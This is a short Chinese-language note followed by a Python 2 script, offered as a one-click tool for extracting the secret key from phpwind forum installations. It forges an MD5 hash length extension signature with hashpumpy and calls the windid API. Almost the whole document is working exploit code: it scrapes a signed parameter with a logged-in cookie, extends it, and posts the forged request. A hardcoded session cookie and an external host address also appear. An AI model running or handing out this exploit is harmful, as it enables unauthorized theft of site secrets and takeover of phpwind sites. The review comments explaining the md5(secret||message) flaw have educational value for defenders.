利用md5 length extension attack,具体分析文章:https://www.leavesongs.com/PENETRATION/phpwind-hash-length-extension-attack.html

phpwind获得secretkey一键化脚本,填写一下cookie和url就可以获得secretkey

#coding=utf-8
import urllib
import urllib2
import time
import cookielib
import gzip
import StringIO
from bs4 import BeautifulSoup
import re
import hashpumpy
import sys
# Python 2-only hack: site.py removes sys.setdefaultencoding at startup, so
# the module is reloaded to get it back and implicit str/unicode coercion is
# switched to UTF-8 (the page scraped below is Chinese-language).
reload(sys)
sys.setdefaultencoding('utf-8')

def get_key(url):
    """Fetch the avatar page of the logged-in user and read the signed windid parameters.

    The request goes through the module-level ``opener`` (created in
    ``__main__``) so it carries the session cookie.  The Flash uploader's
    ``FlashVars`` ``<param>`` holds a URL-encoded query string whose
    ``windidkey`` value is the hex digest that ``padding_exten`` later extends.

    Returns:
        A 4-tuple of strings ``(uid, windidkey, time, clientid)``.

    Raises:
        AttributeError: no ``FlashVars`` param is present on the page.
        IndexError: the query string does not have the expected layout.
    """
    page_url = '%s/?m=profile&c=avatar&_left=avatar' % url
    resp = opener.open(page_url)
    body = resp.read()
    # gzip is requested via Accept-Encoding in __main__ and urllib2 does not
    # decompress transparently, so inflate by hand when the server used it.
    if resp.info().get('Content-Encoding') == 'gzip':
        with gzip.GzipFile(fileobj=StringIO.StringIO(body)) as gz:
            body = gz.read()

    flash_vars = BeautifulSoup(body, 'lxml').find('param', attrs={'name': 'FlashVars'})
    query = urllib.unquote(flash_vars.get('value'))
    matcher = re.compile('uid=(.+?)&windidkey=(.+?)&time=(.+?)&clientid=(.+?)&type', re.S)
    hits = matcher.findall(query)
    return hits[0]

def padding_exten(windidkey,time,uid):
    """Extend the server's MD5 signature so it also covers extra API parameters.

    ``windidkey`` is the hex MD5 the server computed over
    ``secret + original_data``; ``key_length`` is the assumed byte length of
    that secret.  hashpumpy recomputes a valid digest for
    ``original_data + glue padding + data_to_add`` without knowing the secret.

    Returns ``[new_hexdigest, padding]`` where ``padding`` is the glue
    padding percent-encoded for use inside a query string.

    NOTE(review): the weakness exploited here is the ``md5(secret || message)``
    construction itself; a keyed MAC such as HMAC does not expose the hash
    state and is not extendable this way.
    """
    hexdigest = windidkey
    # Must reproduce byte for byte the string the server hashed.  It appears to
    # be the timestamp followed by the request parameters sorted by key and
    # concatenated as key+value (a=doAvatar, c=avatar, m=api, type=flash,
    # uid=<uid>, uid=undefined); the same literal is rebuilt in __main__.
    original_data = time+'adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined'
    # Parameters of the call being appended: a=list, c=app, m=api, matching
    # the POST body sent in __main__.
    data_to_add = 'alistcappmapi'
    # Guessed secret length; the glue padding is only correct if this matches.
    key_length = 32    
    result = list()
    # rs[0] is the new hex digest, rs[1] the raw bytes
    # original_data + padding + data_to_add.
    rs = hashpumpy.hashpump(hexdigest,original_data,data_to_add,key_length)
    result.append(rs[0])

    # Pull the padding out of repr(rs): non-printable bytes show up as '\xNN',
    # which becomes the URL escape '%NN'.  NOTE(review): this depends on repr()
    # formatting and on the message containing no quote or comma characters.
    tmp = str(rs)
    tmp = tmp.split(',')[1]
    tmp = tmp.split("\'")[1]
    tmp = tmp.replace('\\x','%')   
    # The padding is exactly the span between the end of original_data and
    # the start of data_to_add.
    rule = 'undefined(.+?)alist'
    Pattern = re.compile(rule, re.S)
    tmp = re.findall(Pattern, tmp)
    result.append(tmp[0]) 
    return result


if __name__ == '__main__':
    # Target base URL and a logged-in session cookie; both are filled in by hand.
    url = 'http://192.168.0.100/phpwind'
    cookie = 'CNZZDATA1257835621=169451052-1472798292-null%7C1472798292; PHPSESSID=5adaadb063b4208acd574d3d044dda38; ECS[visit_times]=5; csrf_token=ab686222777d7f80; xzr_winduser=PbUcCS1OT1ZjCzY8GoJOV8EOvix9OdGpc%2BmWBPYV6ar07B7AZSOhSw%3D%3D; xzr_lastvisit=7%091475751418%09%2Fphpwind%2F%3Fm%3Dprofile%26c%3Davatar%26_left%3Davatar; xzr_visitor=cx59FPbNJ4FYG2e9cWKpUP%2FTZTef7Yu4DTFLTftwwZ%2FPEVo8'
    # `opener` is read as a module-level global by get_key().
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    # Browser-looking request headers.  Note that the Cookie is sent as a raw
    # header in addition to the CookieJar, and that Host/Referer are pinned to
    # a host that differs from `url`.
    browser_headers = [
        ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'),
        ('Accept', '*/*'),
        ('Accept-Language', 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'),
        ('Accept-Encoding', 'gzip, deflate'),
        ('Connection', 'keep-alive'),
        ('Cookie', cookie),
        ('Host', '106.75.33.217:5888'),
        ('Referer', 'http://106.75.33.217:5888/rob.php?id=740'),
        ('Cache-Control', 'max-age=0'),
    ]
    opener.addheaders.extend(browser_headers)

    uid, windidkey, time, clientid = get_key(url)
    windidkey, padding = padding_exten(windidkey, time, uid)
    # The forged digest goes into windidkey; the original signed parameters
    # plus the glue padding are replayed as a single trailing query key so the
    # server hashes the same byte sequence hashpumpy extended.
    query = ('/windid/index.php?time=%s&windidkey=%s&clientid=%s'
             '&adoAvatarcavatarmapitypeflashuid%suidundefined=%s'
             % (time, windidkey, clientid, uid, padding))
    target = url + query

    # POST body with the appended parameters (a=list, c=app, m=api).
    form = urllib.urlencode({'m': 'api', 'c': 'app', 'a': 'list'})
    resp = opener.open(target, form)
    html = resp.read()

    # Same manual gzip handling as in get_key().
    if resp.info().get('Content-Encoding') == 'gzip':
        with gzip.GzipFile(fileobj=StringIO.StringIO(html)) as gz:
            html = gz.read()
    print(html)